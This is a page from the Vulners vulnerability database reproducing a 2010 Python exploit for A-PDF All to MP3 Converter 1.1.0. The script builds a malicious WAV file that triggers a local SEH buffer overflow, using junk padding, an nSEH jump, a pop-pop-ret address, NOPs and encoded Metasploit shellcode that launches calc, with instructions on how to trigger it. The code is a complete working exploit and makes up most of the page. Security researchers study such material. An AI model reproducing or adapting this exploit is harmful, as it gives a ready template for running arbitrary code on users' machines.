Vulners
Lucene search
A-PDF All To MP3 Coverter 1.1.0 Universal Exploit
`#!/usr/bin/python
################################################################################
# Exploit Title: A-PDF All to MP3 Converter v.1.1.0 Universal Local SEH Exploit
# Date: September 18, 2010
# Author: modpr0be
# Software Link: http://www.a-pdf.com/all-to-mp3/download.htm
# Version: 1.1.0
# Tested on: Windows XP SP3
#
# Open application --> Next --> Add --> blah.wav --> calc will pop out
#
# Other applications made by a-pdf may be affected.
# this exploit is simply reference from EDB 14681 and 14676
# Exploit using direct EIP is also working.
#
# thx: amalia, offsec, xecureit, jasakom, oebaj, 0x70y, postnix.
################################################################################
import struct
junk1 = 'A' * 4132
nseh = "\xeb\x06\x90\x90"
seh = struct.pack('<L', 0x00408B44) # ppr
nops2 = "\x90" * 12
# metasploit payload
# windows/exec cmd=calc | msfencode -e x86/alpha_upper
# size 462 bytes
shellcode = ("\x89\xe1\xda\xde\xd9\x71\xf4\x5a\x4a\x4a\x4a\x4a\x4a\x43\x43"
"\x43\x43\x43\x43\x52\x59\x56\x54\x58\x33\x30\x56\x58\x34\x41"
"\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41\x42"
"\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58\x50"
"\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x4d\x38\x4b\x39\x43\x30\x43"
"\x30\x43\x30\x43\x50\x4c\x49\x4d\x35\x46\x51\x48\x52\x43\x54"
"\x4c\x4b\x50\x52\x50\x30\x4c\x4b\x46\x32\x44\x4c\x4c\x4b\x50"
"\x52\x44\x54\x4c\x4b\x44\x32\x51\x38\x44\x4f\x4e\x57\x50\x4a"
"\x51\x36\x50\x31\x4b\x4f\x50\x31\x49\x50\x4e\x4c\x47\x4c\x45"
"\x31\x43\x4c\x44\x42\x46\x4c\x47\x50\x49\x51\x48\x4f\x44\x4d"
"\x45\x51\x4f\x37\x4d\x32\x4c\x30\x46\x32\x51\x47\x4c\x4b\x46"
"\x32\x42\x30\x4c\x4b\x50\x42\x47\x4c\x43\x31\x48\x50\x4c\x4b"
"\x47\x30\x43\x48\x4d\x55\x49\x50\x44\x34\x51\x5a\x43\x31\x4e"
"\x30\x46\x30\x4c\x4b\x51\x58\x45\x48\x4c\x4b\x50\x58\x47\x50"
"\x45\x51\x48\x53\x4d\x33\x47\x4c\x51\x59\x4c\x4b\x50\x34\x4c"
"\x4b\x43\x31\x49\x46\x50\x31\x4b\x4f\x46\x51\x4f\x30\x4e\x4c"
"\x4f\x31\x48\x4f\x44\x4d\x43\x31\x49\x57\x47\x48\x4b\x50\x44"
"\x35\x4c\x34\x43\x33\x43\x4d\x4c\x38\x47\x4b\x43\x4d\x46\x44"
"\x42\x55\x4b\x52\x51\x48\x4c\x4b\x51\x48\x51\x34\x43\x31\x48"
"\x53\x45\x36\x4c\x4b\x44\x4c\x50\x4b\x4c\x4b\x50\x58\x45\x4c"
"\x43\x31\x48\x53\x4c\x4b\x45\x54\x4c\x4b\x45\x51\x4e\x30\x4b"
"\x39\x50\x44\x47\x54\x46\x44\x51\x4b\x51\x4b\x43\x51\x46\x39"
"\x50\x5a\x50\x51\x4b\x4f\x4b\x50\x50\x58\x51\x4f\x51\x4a\x4c"
"\x4b\x44\x52\x4a\x4b\x4d\x56\x51\x4d\x42\x4a\x43\x31\x4c\x4d"
"\x4c\x45\x48\x39\x43\x30\x45\x50\x43\x30\x50\x50\x43\x58\x50"
"\x31\x4c\x4b\x42\x4f\x4d\x57\x4b\x4f\x49\x45\x4f\x4b\x4c\x30"
"\x48\x35\x49\x32\x50\x56\x45\x38\x4e\x46\x4d\x45\x4f\x4d\x4d"
"\x4d\x4b\x4f\x48\x55\x47\x4c\x43\x36\x43\x4c\x45\x5a\x4b\x30"
"\x4b\x4b\x4b\x50\x42\x55\x43\x35\x4f\x4b\x47\x37\x45\x43\x42"
"\x52\x42\x4f\x43\x5a\x43\x30\x50\x53\x4b\x4f\x49\x45\x45\x33"
"\x45\x31\x42\x4c\x45\x33\x43\x30\x45\x5a\x41\x41")
payload = junk1+nseh+seh+nops2+shellcode
file = open('blah.wav','w')
file.write(payload)
file.close()
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
18 Sep 2010 00:00Current
0.1Low risk
Vulners AI Score0.1